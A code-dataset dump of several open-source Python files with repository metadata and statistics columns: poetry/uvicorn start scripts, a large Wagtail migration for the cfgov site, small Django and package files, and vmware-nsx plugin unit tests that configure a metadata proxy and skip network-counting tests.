(1, 1 ,1 ,1 ,1 ,1 ,1 ,1), (1, 1 ,1 ,1 ,1 ,1 ,1 ,1), (1, 1 ,1 ,1 ,1 ,1 ,1 ,1), #69-71
]
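# --- Illustrative accessor (added sketch; names are hypothetical). ---
# `level` holds 72 rows of 8 tiles each (the trailing comments give the
# row indices), so a bounds-checked lookup is just:
def tile_at(row, col):
    assert 0 <= row < len(level) and 0 <= col < len(level[row])
    return level[row][col]

assert len(level) == 72 and all(len(row) == 8 for row in level)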
----- [record] hexsha: f91adcd080a2da53fa25c028c84301a537fdfc42 | size: 185 | lang: Python | path: devtoapi/scripts/__init__.py | repo: volt1c/devto-api @ 66a493f3c1ae6100a3fc203a5c441f2c04ad6e35 | licenses: [MIT] -----
import subprocess
def start_dev():
subprocess.run('poetry run uvicorn devtoapi:app --reload'.split())
def start():
subprocess.run('poetry run uvicorn devtoapi:app'.split())
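# --- Usage note (added sketch; assumes Poetry script entry points). ---
# These helpers are presumably exposed via pyproject.toml, e.g.:
#
#     [tool.poetry.scripts]
#     start = "devtoapi.scripts:start"
#     start-dev = "devtoapi.scripts:start_dev"
#
# so that `poetry run start-dev` serves the app with --reload enabled.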
----- [record] hexsha: 9721e63434ec25cb5ed822b474ac1396a7a18305 | size: 21,982 | lang: Python | path: cfgov/v1/migrations/0048_remove_body_header_fields_from_main_contact_info.py | repo: cyVR/aur @ 269dad2e659f7366e6eea037110d38ab41e3ad53 | licenses: [CC0-1.0] -----
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
import v1.models.snippets
import wagtail.wagtailcore.fields
import wagtail.wagtailcore.blocks
import wagtail.wagtailsnippets.blocks
import wagtail.wagtailimages.blocks
import v1.atomic_elements.organisms
class Migration(migrations.Migration):
dependencies = [
('v1', '0047_resource_snippet_lists'),
]
operations = [
migrations.RemoveField(
model_name='contact',
name='hash',
),
migrations.AlterField(
model_name='cfgovpage',
name='sidefoot',
field=wagtail.wagtailcore.fields.StreamField([(b'call_to_action', wagtail.wagtailcore.blocks.StructBlock([(b'slug_text', wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'paragraph_text', wagtail.wagtailcore.blocks.RichTextBlock(required=False)), (b'button', wagtail.wagtailcore.blocks.StructBlock([(b'text', wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'url', wagtail.wagtailcore.blocks.CharBlock(default=b'/', required=False))]))])), (b'related_links', wagtail.wagtailcore.blocks.StructBlock([(b'heading', wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'paragraph', wagtail.wagtailcore.blocks.RichTextBlock(required=False)), (b'links', wagtail.wagtailcore.blocks.ListBlock(wagtail.wagtailcore.blocks.StructBlock([(b'text', wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'url', wagtail.wagtailcore.blocks.CharBlock(default=b'/', required=False))])))])), (b'related_posts', wagtail.wagtailcore.blocks.StructBlock([(b'limit', wagtail.wagtailcore.blocks.CharBlock(default=b'3', label=b'Limit')), (b'show_heading', wagtail.wagtailcore.blocks.BooleanBlock(help_text=b'This toggles the heading and icon for the related types.', default=True, required=False, label=b'Show Heading and Icon?')), (b'header_title', wagtail.wagtailcore.blocks.CharBlock(default=b'Further reading', label=b'Slug Title')), (b'relate_posts', wagtail.wagtailcore.blocks.BooleanBlock(default=True, required=False, editable=False, label=b'Blog Posts')), (b'relate_newsroom', wagtail.wagtailcore.blocks.BooleanBlock(default=True, required=False, editable=False, label=b'Newsroom')), (b'relate_events', wagtail.wagtailcore.blocks.BooleanBlock(default=True, required=False, label=b'Events')), (b'specific_categories', wagtail.wagtailcore.blocks.ListBlock(wagtail.wagtailcore.blocks.ChoiceBlock(required=False, choices=[(b'Blog', ((b'At the CFPB', b'At the CFPB'), (b'Policy & Compliance', b'Policy & Compliance'), (b'Data, Research & Reports', b'Data, research & reports'), (b'Info for Consumers', b'Info for consumers'))), (b'Newsroom', ((b'Op-Ed', b'Op-Ed'), (b'Press Release', b'Press Release'), (b'Speech', b'Speech'), (b'Testimony', b'Testimony')))]), required=False))])), (b'related_metadata', wagtail.wagtailcore.blocks.StructBlock([(b'slug', wagtail.wagtailcore.blocks.CharBlock(max_length=100)), (b'content', wagtail.wagtailcore.blocks.StreamBlock([(b'text', wagtail.wagtailcore.blocks.StructBlock([(b'heading', wagtail.wagtailcore.blocks.CharBlock(max_length=100)), (b'blob', wagtail.wagtailcore.blocks.RichTextBlock())], icon=b'pilcrow')), (b'list', wagtail.wagtailcore.blocks.StructBlock([(b'heading', wagtail.wagtailcore.blocks.CharBlock(max_length=100)), (b'links', wagtail.wagtailcore.blocks.ListBlock(wagtail.wagtailcore.blocks.StructBlock([(b'text', wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'url', wagtail.wagtailcore.blocks.CharBlock(default=b'/', required=False))])))], icon=b'list-ul')), (b'date', wagtail.wagtailcore.blocks.StructBlock([(b'heading', wagtail.wagtailcore.blocks.CharBlock(max_length=100)), (b'date', wagtail.wagtailcore.blocks.DateBlock(required=False))], icon=b'date')), (b'topics', wagtail.wagtailcore.blocks.StructBlock([(b'heading', wagtail.wagtailcore.blocks.CharBlock(default=b'Topics', max_length=100)), (b'show_topics', wagtail.wagtailcore.blocks.BooleanBlock(default=True, required=False))], icon=b'tag'))])), (b'half_width', wagtail.wagtailcore.blocks.BooleanBlock(default=False, required=False))])), (b'email_signup', wagtail.wagtailcore.blocks.StructBlock([(b'heading', 
wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'text', wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'gd_code', wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'form_field', wagtail.wagtailcore.blocks.ListBlock(wagtail.wagtailcore.blocks.StructBlock([(b'btn_text', wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'required', wagtail.wagtailcore.blocks.BooleanBlock(required=False)), (b'info', wagtail.wagtailcore.blocks.RichTextBlock(required=False, label=b'Disclaimer')), (b'label', wagtail.wagtailcore.blocks.CharBlock(required=True)), (b'type', wagtail.wagtailcore.blocks.ChoiceBlock(required=False, choices=[(b'text', b'Text'), (b'checkbox', b'Checkbox'), (b'email', b'Email'), (b'number', b'Number'), (b'url', b'URL'), (b'radio', b'Radio')])), (b'placeholder', wagtail.wagtailcore.blocks.CharBlock(required=False))]), required=False, icon=b'mail'))])), (b'contact', wagtail.wagtailcore.blocks.StructBlock([(b'contact', wagtail.wagtailsnippets.blocks.SnippetChooserBlock(v1.models.snippets.Contact))])), (b'sidebar_contact', wagtail.wagtailcore.blocks.StructBlock([(b'contact', wagtail.wagtailsnippets.blocks.SnippetChooserBlock(v1.models.snippets.Contact))])), (b'rss_feed', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[(b'blog_feed', b'Blog Feed'), (b'newsroom_feed', b'Newsroom Feed')])), (b'social_media', wagtail.wagtailcore.blocks.StructBlock([(b'is_share_view', wagtail.wagtailcore.blocks.BooleanBlock(help_text=b'If unchecked, social media icons will link users to official CFPB accounts. Do not fill in any further fields.', default=True, required=False, label=b'Desired action: share this page')), (b'blurb', wagtail.wagtailcore.blocks.CharBlock(help_text=b'Sets the tweet text, email subject line, and LinkedIn post text.', default=b"Look what I found on the CFPB's site!", required=False)), (b'twitter_text', wagtail.wagtailcore.blocks.CharBlock(help_text=b'(Optional) Custom text for Twitter shares. If blank, will default to value of blurb field above.', max_length=100, required=False)), (b'twitter_related', wagtail.wagtailcore.blocks.CharBlock(help_text=b'(Optional) A comma-separated list of accounts related to the content of the shared URL. Do not enter the @ symbol. If blank, it will default to just "cfpb".', required=False)), (b'twitter_hashtags', wagtail.wagtailcore.blocks.CharBlock(help_text=b'(Optional) A comma-separated list of hashtags to be appended to default tweet text.', required=False)), (b'twitter_lang', wagtail.wagtailcore.blocks.CharBlock(help_text=b'(Optional) Loads text components in the specified language, if other than English. E.g., use "es" for Spanish. See https://dev.twitter.com/web/overview/languages for a list of supported language codes.', required=False)), (b'email_title', wagtail.wagtailcore.blocks.CharBlock(help_text=b'(Optional) Custom subject for email shares. If blank, will default to value of blurb field above.', required=False)), (b'email_text', wagtail.wagtailcore.blocks.CharBlock(help_text=b'(Optional) Custom text for email shares. If blank, will default to "Check out this page from the CFPB".', required=False)), (b'email_signature', wagtail.wagtailcore.blocks.CharBlock(help_text=b'(Optional) Adds a custom signature line to email shares. ', required=False)), (b'linkedin_title', wagtail.wagtailcore.blocks.CharBlock(help_text=b'(Optional) Custom title for LinkedIn shares. 
If blank, will default to value of blurb field above.', required=False)), (b'linkedin_text', wagtail.wagtailcore.blocks.CharBlock(help_text=b'(Optional) Custom text for LinkedIn shares.', required=False))]))], blank=True),
),
migrations.AlterField(
model_name='sublandingpage',
name='content',
field=wagtail.wagtailcore.fields.StreamField([(b'text_introduction', wagtail.wagtailcore.blocks.StructBlock([(b'heading', wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'intro', wagtail.wagtailcore.blocks.RichTextBlock(required=False)), (b'body', wagtail.wagtailcore.blocks.RichTextBlock(required=False)), (b'links', wagtail.wagtailcore.blocks.ListBlock(wagtail.wagtailcore.blocks.StructBlock([(b'text', wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'url', wagtail.wagtailcore.blocks.CharBlock(default=b'/', required=False))]), required=False)), (b'has_rule', wagtail.wagtailcore.blocks.BooleanBlock(required=False))])), (b'featured_content', wagtail.wagtailcore.blocks.StructBlock([(b'heading', wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'body', wagtail.wagtailcore.blocks.RichTextBlock(required=False)), (b'category', wagtail.wagtailcore.blocks.ChoiceBlock(required=False, choices=[(b'featured-event', b'Featured event'), (b'featured-blog', b'Featured blog'), (b'featured-video', b'Featured video'), (b'featured-tool', b'Featured tool'), (b'featured-news', b'Featured news'), (b'featured', b'Featured')])), (b'post', wagtail.wagtailcore.blocks.PageChooserBlock(required=False)), (b'show_post_link', wagtail.wagtailcore.blocks.BooleanBlock(required=False, label=b'Render post link?')), (b'post_link_text', wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'image', wagtail.wagtailcore.blocks.StructBlock([(b'upload', wagtail.wagtailimages.blocks.ImageChooserBlock(required=False)), (b'alt', wagtail.wagtailcore.blocks.CharBlock(required=False))])), (b'links', wagtail.wagtailcore.blocks.ListBlock(wagtail.wagtailcore.blocks.StructBlock([(b'text', wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'url', wagtail.wagtailcore.blocks.CharBlock(default=b'/', required=False))]), label=b'Additional Links')), (b'video', wagtail.wagtailcore.blocks.StructBlock([(b'id', wagtail.wagtailcore.blocks.CharBlock(help_text=b'E.g., in "https://www.youtube.com/watch?v=en0Iq8II4fA", the ID is everything after the "?v=".', required=False, label=b'ID')), (b'url', wagtail.wagtailcore.blocks.CharBlock(help_text=b'You must use the embed URL, e.g., https://www.youtube.com/embed/JPTg8ZB3j5c?autoplay=1&enablejsapi=1', required=False, label=b'URL')), (b'height', wagtail.wagtailcore.blocks.CharBlock(default=b'320', required=False)), (b'width', wagtail.wagtailcore.blocks.CharBlock(default=b'568', required=False))]))])), (b'image_text_25_75_group', wagtail.wagtailcore.blocks.StructBlock([(b'heading', wagtail.wagtailcore.blocks.CharBlock(required=False, icon=b'title')), (b'should_link_image', wagtail.wagtailcore.blocks.BooleanBlock(help_text=b"Check this to link all images to the URL of the first link in their unit's list, if there is a link.", default=False, required=False)), (b'image_texts', wagtail.wagtailcore.blocks.ListBlock(wagtail.wagtailcore.blocks.StructBlock([(b'heading', wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'body', wagtail.wagtailcore.blocks.RichTextBlock(required=False)), (b'image', wagtail.wagtailcore.blocks.StructBlock([(b'upload', wagtail.wagtailimages.blocks.ImageChooserBlock(required=False)), (b'alt', wagtail.wagtailcore.blocks.CharBlock(required=False))])), (b'links', wagtail.wagtailcore.blocks.ListBlock(wagtail.wagtailcore.blocks.StructBlock([(b'text', wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'url', wagtail.wagtailcore.blocks.CharBlock(default=b'/', required=False))]), required=False)), (b'has_rule', wagtail.wagtailcore.blocks.BooleanBlock(required=False))])))])), (b'image_text_50_50_group', wagtail.wagtailcore.blocks.StructBlock([(b'heading', wagtail.wagtailcore.blocks.CharBlock(required=False, icon=b'title')), (b'sharing', wagtail.wagtailcore.blocks.StructBlock([(b'shareable', wagtail.wagtailcore.blocks.BooleanBlock(help_text=b'If checked, share links will be included below the items.', required=False, label=b'Include sharing links?')), (b'share_blurb', wagtail.wagtailcore.blocks.CharBlock(help_text=b'Sets the tweet text, email subject line, and LinkedIn post text.', required=False))])), (b'image_texts', wagtail.wagtailcore.blocks.ListBlock(wagtail.wagtailcore.blocks.StructBlock([(b'heading', wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'body', wagtail.wagtailcore.blocks.RichTextBlock(required=False, blank=True)), (b'image', wagtail.wagtailcore.blocks.StructBlock([(b'upload', wagtail.wagtailimages.blocks.ImageChooserBlock(required=False)), (b'alt', wagtail.wagtailcore.blocks.CharBlock(required=False))])), (b'is_widescreen', wagtail.wagtailcore.blocks.BooleanBlock(required=False, label=b'Use 16:9 image')), (b'is_button', wagtail.wagtailcore.blocks.BooleanBlock(required=False, label=b'Show links as button')), (b'links', wagtail.wagtailcore.blocks.ListBlock(wagtail.wagtailcore.blocks.StructBlock([(b'text', wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'url', wagtail.wagtailcore.blocks.CharBlock(default=b'/', required=False))]), required=False))])))])), (b'full_width_text', wagtail.wagtailcore.blocks.StreamBlock([(b'content_with_anchor', wagtail.wagtailcore.blocks.StructBlock([(b'content_block', wagtail.wagtailcore.blocks.RichTextBlock()), (b'anchor_link', wagtail.wagtailcore.blocks.StructBlock([(b'link_id', wagtail.wagtailcore.blocks.CharBlock(help_text=(b'Auto-generated on save, or enter some human-friendly text ', b'to make it easier to read.'), required=False, label=b'ID for this content block'))]))])), (b'content', wagtail.wagtailcore.blocks.RichTextBlock(icon=b'edit')), (b'media', wagtail.wagtailimages.blocks.ImageChooserBlock(icon=b'image')), (b'quote', wagtail.wagtailcore.blocks.StructBlock([(b'body', wagtail.wagtailcore.blocks.TextBlock()), (b'citation', wagtail.wagtailcore.blocks.TextBlock())])), (b'cta', wagtail.wagtailcore.blocks.StructBlock([(b'slug_text', wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'paragraph_text', wagtail.wagtailcore.blocks.RichTextBlock(required=False)), (b'button', wagtail.wagtailcore.blocks.StructBlock([(b'text', wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'url', wagtail.wagtailcore.blocks.CharBlock(default=b'/', required=False))]))])), (b'related_links', wagtail.wagtailcore.blocks.StructBlock([(b'heading', wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'paragraph', wagtail.wagtailcore.blocks.RichTextBlock(required=False)), (b'links', wagtail.wagtailcore.blocks.ListBlock(wagtail.wagtailcore.blocks.StructBlock([(b'text', wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'url', wagtail.wagtailcore.blocks.CharBlock(default=b'/', required=False))])))])), (b'table', wagtail.wagtailcore.blocks.StructBlock([(b'headers', wagtail.wagtailcore.blocks.ListBlock(wagtail.wagtailcore.blocks.CharBlock())), (b'rows', wagtail.wagtailcore.blocks.ListBlock(wagtail.wagtailcore.blocks.StreamBlock([(b'hyperlink', wagtail.wagtailcore.blocks.StructBlock([(b'text', wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'url', wagtail.wagtailcore.blocks.CharBlock(default=b'/', required=False))])), (b'text', wagtail.wagtailcore.blocks.CharBlock()), (b'text_blob', wagtail.wagtailcore.blocks.TextBlock()), (b'rich_text_blob', wagtail.wagtailcore.blocks.RichTextBlock())])))], editable=False)), (b'table_block', v1.atomic_elements.organisms.AtomicTableBlock(table_options={b'renderer': b'html'}))])), (b'half_width_link_blob_group', wagtail.wagtailcore.blocks.StructBlock([(b'heading', wagtail.wagtailcore.blocks.CharBlock(required=False, icon=b'title')), (b'has_top_border', wagtail.wagtailcore.blocks.BooleanBlock(required=False)), (b'has_bottom_border', wagtail.wagtailcore.blocks.BooleanBlock(required=False)), (b'link_blobs', wagtail.wagtailcore.blocks.ListBlock(wagtail.wagtailcore.blocks.StructBlock([(b'heading', wagtail.wagtailcore.blocks.CharBlock(required=False, label=b'H3 heading')), (b'sub_heading', wagtail.wagtailcore.blocks.CharBlock(required=False, label=b'H4 heading')), (b'sub_heading_icon', wagtail.wagtailcore.blocks.CharBlock(help_text=b'A list of icon names can be obtained at: https://cfpb.github.io/capital-framework/components/cf-icons/. Examples: linkedin-square, facebook-square, etc.', required=False, label=b'H4 heading icon')), (b'body', wagtail.wagtailcore.blocks.RichTextBlock(required=False, blank=True)), (b'links', wagtail.wagtailcore.blocks.ListBlock(wagtail.wagtailcore.blocks.StructBlock([(b'text', wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'url', wagtail.wagtailcore.blocks.CharBlock(default=b'/', required=False))]), required=False))])))])), (b'third_width_link_blob_group', wagtail.wagtailcore.blocks.StructBlock([(b'heading', wagtail.wagtailcore.blocks.CharBlock(required=False, icon=b'title')), (b'has_top_border', wagtail.wagtailcore.blocks.BooleanBlock(required=False)), (b'has_bottom_border', wagtail.wagtailcore.blocks.BooleanBlock(required=False)), (b'link_blobs', wagtail.wagtailcore.blocks.ListBlock(wagtail.wagtailcore.blocks.StructBlock([(b'heading', wagtail.wagtailcore.blocks.CharBlock(required=False, label=b'H3 heading')), (b'sub_heading', wagtail.wagtailcore.blocks.CharBlock(required=False, label=b'H4 heading')), (b'sub_heading_icon', wagtail.wagtailcore.blocks.CharBlock(help_text=b'A list of icon names can be obtained at: https://cfpb.github.io/capital-framework/components/cf-icons/. Examples: linkedin-square, facebook-square, etc.', required=False, label=b'H4 heading icon')), (b'body', wagtail.wagtailcore.blocks.RichTextBlock(required=False, blank=True)), (b'links', wagtail.wagtailcore.blocks.ListBlock(wagtail.wagtailcore.blocks.StructBlock([(b'text', wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'url', wagtail.wagtailcore.blocks.CharBlock(default=b'/', required=False))]), required=False))])))])), (b'post_preview_snapshot', wagtail.wagtailcore.blocks.StructBlock([(b'limit', wagtail.wagtailcore.blocks.CharBlock(help_text=b'How many posts do you want to show?', default=b'3', label=b'Limit')), (b'post_date_description', wagtail.wagtailcore.blocks.CharBlock(default=b'Published'))])), (b'well', wagtail.wagtailcore.blocks.StructBlock([(b'content', wagtail.wagtailcore.blocks.RichTextBlock(required=False, label=b'Well'))])), (b'table', wagtail.wagtailcore.blocks.StructBlock([(b'headers', wagtail.wagtailcore.blocks.ListBlock(wagtail.wagtailcore.blocks.CharBlock())), (b'rows', wagtail.wagtailcore.blocks.ListBlock(wagtail.wagtailcore.blocks.StreamBlock([(b'hyperlink', wagtail.wagtailcore.blocks.StructBlock([(b'text', wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'url', wagtail.wagtailcore.blocks.CharBlock(default=b'/', required=False))])), (b'text', wagtail.wagtailcore.blocks.CharBlock()), (b'text_blob', wagtail.wagtailcore.blocks.TextBlock()), (b'rich_text_blob', wagtail.wagtailcore.blocks.RichTextBlock())])))], editable=False)), (b'table_block', v1.atomic_elements.organisms.AtomicTableBlock(table_options={b'renderer': b'html'})), (b'contact', wagtail.wagtailcore.blocks.StructBlock([(b'contact', wagtail.wagtailsnippets.blocks.SnippetChooserBlock(v1.models.snippets.Contact))])), (b'formfield_with_button', wagtail.wagtailcore.blocks.StructBlock([(b'btn_text', wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'required', wagtail.wagtailcore.blocks.BooleanBlock(required=False)), (b'info', wagtail.wagtailcore.blocks.RichTextBlock(required=False, label=b'Disclaimer')), (b'label', wagtail.wagtailcore.blocks.CharBlock(required=True)), (b'type', wagtail.wagtailcore.blocks.ChoiceBlock(required=False, choices=[(b'text', b'Text'), (b'checkbox', b'Checkbox'), (b'email', b'Email'), (b'number', b'Number'), (b'url', b'URL'), (b'radio', b'Radio')])), (b'placeholder', wagtail.wagtailcore.blocks.CharBlock(required=False))])), (b'reg_comment', wagtail.wagtailcore.blocks.StructBlock([(b'document_id', wagtail.wagtailcore.blocks.CharBlock(help_text=b'Federal Register document ID number to which the comment should be submitted. Should follow this format: CFPB-YYYY-####-####', required=True, label=b'Document ID')), (b'generic_regs_link', wagtail.wagtailcore.blocks.BooleanBlock(help_text=b'If unchecked, the link to comment at Regulations.gov if you want to add attachments will link directly to the document given above. Leave this checked if this comment form is being published before the full document is live at Regulations.gov, then uncheck it when the full document has been published.', default=True, required=False, label=b'Use generic Regs.gov link?')), (b'id', wagtail.wagtailcore.blocks.CharBlock(help_text=b"Sets the `id` attribute in the form's markup. If not set, the form will be assigned a base id of `o-reg-comment_` with a random number appended.", required=False, label=b'Form ID'))])), (b'feedback', wagtail.wagtailcore.blocks.StructBlock([(b'was_it_helpful_text', wagtail.wagtailcore.blocks.CharBlock(help_text=b'Use this field only for feedback forms that use "Was this helpful?" radio buttons.', default=b'Was this page helpful to you?', required=False)), (b'intro_text', wagtail.wagtailcore.blocks.CharBlock(help_text=b'Optional feedback intro', required=False)), (b'question_text', wagtail.wagtailcore.blocks.CharBlock(help_text=b'Optional expansion on intro', required=False)), (b'radio_intro', wagtail.wagtailcore.blocks.CharBlock(help_text=b'Leave blank unless you are building a feedback form with extra radio-button prompts, as in /owning-a-home/help-us-improve/.', required=False)), (b'radio_text', wagtail.wagtailcore.blocks.CharBlock(default=b'This information helps us understand your question better.', required=False)), (b'radio_question_1', wagtail.wagtailcore.blocks.CharBlock(default=b'How soon do you expect to buy a home?', required=False)), (b'radio_question_2', wagtail.wagtailcore.blocks.CharBlock(default=b'Do you currently own a home?', required=False)), (b'button_text', wagtail.wagtailcore.blocks.CharBlock(default=b'Submit')), (b'contact_advisory', wagtail.wagtailcore.blocks.RichTextBlock(help_text=b'Use only for feedback forms that ask for a contact email', required=False))]))], blank=True),
),
]
| 628.057143
| 14,031
| 0.77427
| 2,915
| 21,982
| 5.778388
| 0.136535
| 0.244716
| 0.322014
| 0.188079
| 0.768998
| 0.711232
| 0.672049
| 0.646343
| 0.595524
| 0.571717
| 0
| 0.003188
| 0.058138
| 21,982
| 34
| 14,032
| 646.529412
| 0.810375
| 0.000955
| 0
| 0.178571
| 0
| 0.571429
| 0.274512
| 0.009973
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.285714
| 0
| 0.392857
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
974aef4eec9facadf6008c192d8cf647e69ed0b3
| 228
|
py
|
Python
|
apps/admin.py
|
Edwardhgj/meiduo
|
38796f5caf54676eb5620f50ade5474ee8700ad8
|
[
"MIT"
] | null | null | null |
apps/admin.py
|
Edwardhgj/meiduo
|
38796f5caf54676eb5620f50ade5474ee8700ad8
|
[
"MIT"
] | 6
|
2020-06-05T23:02:49.000Z
|
2022-02-11T03:43:22.000Z
|
apps/admin.py
|
Edwardhgj/meiduo
|
38796f5caf54676eb5620f50ade5474ee8700ad8
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from apps.models import *
# Register your models here.
# admin.site.register(Cate)
# admin.site.register(Tags)
# admin.site.register(Goods)
| 28.5
| 32
| 0.77193
| 33
| 228
| 5.333333
| 0.424242
| 0.255682
| 0.482955
| 0.357955
| 0.431818
| 0.431818
| 0.431818
| 0
| 0
| 0
| 0
| 0
| 0.096491
| 228
| 8
| 33
| 28.5
| 0.854369
| 0.688596
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
97521493ec096906590e3d72301ba789ea0a3d2c
| 121
|
py
|
Python
|
pymdc/api/__init__.py
|
Storj/metadisk-client-python
|
71eaf200760f780ed7a9e50fecf0dd1f24273d91
|
[
"MIT"
] | null | null | null |
pymdc/api/__init__.py
|
Storj/metadisk-client-python
|
71eaf200760f780ed7a9e50fecf0dd1f24273d91
|
[
"MIT"
] | null | null | null |
pymdc/api/__init__.py
|
Storj/metadisk-client-python
|
71eaf200760f780ed7a9e50fecf0dd1f24273d91
|
[
"MIT"
] | null | null | null |
from . buckets import * # NOQA
from . files import * # NOQA
from . keys import * # NOQA
from . users import * # NOQA
| 24.2
| 31
| 0.636364
| 16
| 121
| 4.8125
| 0.4375
| 0.519481
| 0.545455
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.264463
| 121
| 4
| 32
| 30.25
| 0.865169
| 0.157025
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
977c8ec8571a7c7044faceeb69f14e4814458444
| 12,365
|
py
|
Python
|
vmware_nsx/tests/unit/nsx_v/test_md_proxy.py
|
mail2nsrajesh/vmware-nsx
|
63154b510b9fd95c10fffae86bfc49073cafeb40
|
[
"Apache-2.0"
] | null | null | null |
vmware_nsx/tests/unit/nsx_v/test_md_proxy.py
|
mail2nsrajesh/vmware-nsx
|
63154b510b9fd95c10fffae86bfc49073cafeb40
|
[
"Apache-2.0"
] | null | null | null |
vmware_nsx/tests/unit/nsx_v/test_md_proxy.py
|
mail2nsrajesh/vmware-nsx
|
63154b510b9fd95c10fffae86bfc49073cafeb40
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) 2017 OpenStack Foundation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import mock
from oslo_config import cfg
from vmware_nsx.db import nsxv_db
from vmware_nsx.db import nsxv_models
from vmware_nsx.plugins.nsx_v.vshield import edge_utils
from vmware_nsx.tests.unit.nsx_v import test_plugin
PLUGIN_NAME = 'vmware_nsx.plugin.NsxVPlugin'
# Run all relevant plugin tests when the metadata proxy is enabled.
# Those tests do not specifically test the md_proxy; they just verify that
# nothing gets broken.
class NsxVPluginWithMdV2TestCase(test_plugin.NsxVPluginV2TestCase):
def setUp(self, plugin=PLUGIN_NAME,
ext_mgr=None,
service_plugins=None):
# Add the metadata configuration
cfg.CONF.set_override('mgt_net_moid', 'net-1', group="nsxv")
cfg.CONF.set_override('mgt_net_proxy_ips', ['2.2.2.2'], group="nsxv")
cfg.CONF.set_override('mgt_net_proxy_netmask', '255.255.255.0',
group="nsxv")
cfg.CONF.set_override('mgt_net_default_gateway', '1.1.1.1',
group="nsxv")
cfg.CONF.set_override('nova_metadata_ips', ['3.3.3.3'], group="nsxv")
# Add some mocks required for the md code
mock_alloc_vnic = mock.patch.object(nsxv_db, 'allocate_edge_vnic')
mock_alloc_vnic_inst = mock_alloc_vnic.start()
mock_alloc_vnic_inst.return_value = nsxv_models.NsxvEdgeVnicBinding
mock.patch.object(edge_utils, "update_internal_interface").start()
super(NsxVPluginWithMdV2TestCase, self).setUp(
plugin=plugin, ext_mgr=ext_mgr,
service_plugins=service_plugins)
class TestNetworksWithMdV2(test_plugin.TestNetworksV2,
NsxVPluginWithMdV2TestCase):
# Skip all the tests that count networks, as there is an
# additional internal network for metadata (a DRY alternative to these
# per-method skips is sketched after this class).
def test_list_networks_with_sort_native(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_list_networks_without_pk_in_fields_pagination_emulated(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_list_networks_with_sort_emulated(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_list_networks_with_shared(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_list_networks_without_pk_in_fields_pagination_native(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_list_networks_with_parameters(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_list_networks_with_pagination_native(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_list_networks_with_pagination_reverse_emulated(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_list_networks(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_list_networks_with_pagination_emulated(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_list_networks_with_pagination_reverse_native(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_list_networks_with_fields(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_create_networks_bulk_wrong_input(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_create_networks_bulk_native_plugin_failure(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_create_networks_bulk_native_quotas(self):
self.skipTest("The test is not suitable for the metadata test case")
